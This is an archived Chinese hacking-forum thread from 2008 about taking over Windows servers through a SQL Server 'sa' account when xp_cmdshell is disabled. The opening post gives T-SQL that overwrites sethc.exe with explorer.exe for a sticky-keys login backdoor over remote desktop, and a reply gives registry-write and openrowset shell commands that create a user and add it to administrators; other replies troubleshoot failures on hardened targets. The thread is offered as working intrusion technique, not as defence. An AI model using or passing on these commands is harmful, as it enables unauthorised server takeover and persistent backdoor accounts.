[讨论]sa 无xp_cmdshell下取权限又一简单方法(页 1) - 技术交流 - 【3.A.S.T】网络安全爱好者 -- 网络安全，势在必行

jjcd 发表于 2008-7-22 09:42

[讨论]sa 无xp_cmdshell下取权限又一简单方法

[讨论]sa 无xp_cmdshell下取权限又一简单方法
文章作者：charley008
信息来源：邪恶八进制信息安全团队（[url=http://www.eviloctal.com/]www.eviloctal.com[/url]）

有了sa但无xp_cmdshell ，怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块，反正我遇到好多次了。在用exec sp_oacreate 'wscript.shell'也没办法的情况下。。可用此方法
（很多服务器都把'wscript.shell'给删了。）
看到既然能用sp_oacreate，sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制，删除文件吧。。
上网找了些资料，得到下面方法：
复制文件：
复制内容到剪贴板
代码:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
复制内容到剪贴板
代码:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe';
成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理” 用户管理直接加用户。

此法随无技术可言，希望对某些人有点用。
PS：高手能否把Shell.Application 这个也调用呢？希望多多指点
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=13931]0[/url] 积分53 阅读权限40 在线时间33 小时注册时间2005-10-2 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13931]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=137259&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=137259&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-67423.html]ring04h[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
团队执行官
[img]http://forum.eviloctal.com/images/default/star_level2.gif[/img][img]http://forum.eviloctal.com/images/default/star_level2.gif[/img]

阿豪发表于 2008-7-22 09:42

SA 权限还有两个执行系统指令的方法!
1: 沙盒模式。
2:使用SQLSERVERAGENT的JOB来运行系统命令,请先使用下列语句启动SQLSERVERAGENT:
exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'

详细利用方法google之!
帖子3923 精华[url=http://forum.eviloctal.com/digest.php?authorid=67423]128[/url] 积分209640 阅读权限200 性别男在线时间1095 小时注册时间2007-10-23 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=67423]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105244&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105244&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=猎头&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]您知道您年薪应是多少?[/url]

[url=http://forum.eviloctal.com/space-uid-13931.html]charley008[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

rejions 发表于 2008-7-22 09:42

1: 沙盒模式
好像2003我试了没成功过
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=13931]0[/url] 积分53 阅读权限40 在线时间33 小时注册时间2005-10-2 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13931]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105514&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105514&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=干洗店加盟&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]少女暴富的隐秘（图）[/url]

[url=http://forum.eviloctal.com/space-uid-21946.html]heizihui[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

pandio 发表于 2008-7-22 09:42

是啊

沙盒我也没成功过~

在webshell下，连接MSSQL，用SYSADMIN帐号，maste库。都没成功！
郁闷！
不知道什么原因

[Microsoft][ODBC SQL Server Driver][SQL Server]无法装载 DLL xpsql70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。

这个提示是什么意思呢？

xpsql70.dll 没了？
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=21946]0[/url] 积分20 阅读权限40 在线时间6 小时注册时间2005-12-10 最后登录2007-12-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=21946]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105521&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105521&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-21946.html]heizihui[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

dgvios 发表于 2008-7-22 09:42

晕死了~~

又搞了几小时

发现那服务器的人居然把net.exe net1.exe都用CMD.exe替换掉了。真BT啊~~

第3方软件是突破口了~~~

帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=21946]0[/url] 积分20 阅读权限40 在线时间6 小时注册时间2005-12-10 最后登录2007-12-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=21946]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105526&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105526&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-128927.html]ziv[/url] [img]http://forum.eviloctal.com/images/avatars/pw/matrix4.jpg[/img]
晶莹剔透§烈日灼然

Hemry 发表于 2008-7-22 09:42

晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。？
不能用呢~

我用&把 3句连接起来执行出现这

[Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '&' 附近有语法错误。

不能外连，只能在webshell下执行SQL命令呀

怎么写完整？
帖子5 精华[url=http://forum.eviloctal.com/digest.php?authorid=21946]0[/url] 积分20 阅读权限40 在线时间6 小时注册时间2005-12-10 最后登录2007-12-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=21946]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105522&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105522&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=风水&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]良辰择日，预测咨询，公司改名，权威易经[/url]

[url=http://forum.eviloctal.com/space-uid-21946.html]heizihui[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

樱子发表于 2008-7-22 09:42

SA沙盒从木成功过. [img]http://forum.eviloctal.com/images/smilies/tuzki/14.gif[/img]
[url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnadd.gif[/img][/url] [url=http://forum.eviloctal.com/javascript:;][img]http://forum.eviloctal.com/images/default/msnchat.gif[/img][/url] [url=http://wpa.qq.com/msgrd?V=1&Uin=272709165&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子2 精华[url=http://forum.eviloctal.com/digest.php?authorid=128927]0[/url] 积分20 阅读权限40 性别男在线时间2 小时注册时间2007-6-27 最后登录2008-7-17 [url=http://hi.baidu.com/hacker___s]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=128927]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105534&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105534&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP [url=http://www.google.cn/search?q=DHC化妆品&client=pub-0204114945524753&forid=1&prog=aff&ie=UTF-8&oe=UTF-8&cof=GALT%3A#008000;GL%3A1;DIV%3A336699;VLC%3A663399;AH%3Acenter;BGC%3AFFFFFF;LBGC%3A336699;ALC%3A0000FF;LC%3A0000FF;T%3A000000;GFNT%3A0000FF;GIMP%3A0000FF;FORID%3A1&hl=zh-CN]让女孩一夜变的更有女人味[/url]

[url=http://forum.eviloctal.com/space-uid-6846.html]zhuziliu[/url] [img]http://forum.eviloctal.com/images/avatars/pw/eviloctal2.gif[/img]
晶莹剔透§烈日灼然

小李发表于 2008-7-22 09:42

首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user test test /add")')

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators test /add")')

呼，成功了一次。
[url=http://wpa.qq.com/msgrd?V=1&Uin=82918546&Site=邪恶八进制信息安全团队技术讨论组&Menu=yes][img]http://forum.eviloctal.com/images/default/qq.gif[/img][/url]
帖子21 精华[url=http://forum.eviloctal.com/digest.php?authorid=6846]0[/url] 积分70 阅读权限40 在线时间207 小时注册时间2005-7-3 最后登录2008-7-18 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=6846]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105539&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105539&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-92794.html]poc[/url] [img]http://forum.eviloctal.com/images/avatars/pw/smile4.JPG[/img]
晶莹剔透§烈日灼然

133832166 发表于 2008-7-22 09:42

TO ring04h
那个使用SQLSERVERAGENT的JOB来运行系统命令
貌似要知道SQL服务器的名字。
用什么方法才能知道呢？
[img]http://forum.eviloctal.com/images/smilies/yangcong/63.gif[/img]
帖子31 精华[url=http://forum.eviloctal.com/digest.php?authorid=92794]0[/url] 积分90 阅读权限40 性别男在线时间57 小时注册时间2007-3-18 最后登录2008-7-17 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=92794]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105698&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105698&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-13931.html]charley008[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

wendy 发表于 2008-7-22 09:42

引用:
引用第4楼heizihui于2007-12-07 18:10发表的 :
晕哦~~
执行到楼上的第2句出现
[Microsoft][ODBC SQL Server Driver][SQL Server]必须声明变量 '@o'。？
不能用呢~

.......
把第一第二句放在一行。不要分开
帖子16 精华[url=http://forum.eviloctal.com/digest.php?authorid=13931]0[/url] 积分53 阅读权限40 在线时间33 小时注册时间2005-10-2 最后登录2008-7-7 [url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13931]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=105720&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=105720&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-13478.html]唐不狐[/url]
很黃很暴力
[img]http://forum.eviloctal.com/images/avatars/12.gif[/img]
晶莹剔透§烈日灼然

shenbi 发表于 2008-7-22 09:42

xxxx.cpp这个错误是不能用沙盘的。cmd被删除或重新分配权限，导致system无执行权限。
方法：重新上传一个cmd用oa调新的cmd执行。路径任意
帖子145 精华[url=http://forum.eviloctal.com/digest.php?authorid=13478]2[/url] 积分574 阅读权限50 性别男来自china 在线时间106 小时注册时间2005-9-27 最后登录2008-7-9 [url=http://blog.wang1.cn]查看个人网站[/url]
[url=http://forum.eviloctal.com/space.php?action=viewpro&uid=13478]查看详细资料[/url][url=http://forum.eviloctal.com/post.php?action=reply&fid=9&tid=31487&repquote=139478&extra=page%3D9&page=1]引用[/url] [url=http://forum.eviloctal.com/misc.php?action=report&fid=9&tid=31487&pid=139478&page=1]报告[/url] [url=http://forum.eviloctal.com/###]回复[/url] TOP

[url=http://forum.eviloctal.com/space-uid-90237.html]heekey[/url] [img]http://forum.eviloctal.com/images/avatars/noavatar.gif[/img]
晶莹剔透§烈日灼然

页: [1]

【3.A.S.T】网络安全爱好者's Archiver

[讨论]sa 无xp_cmdshell下取权限又一简单方法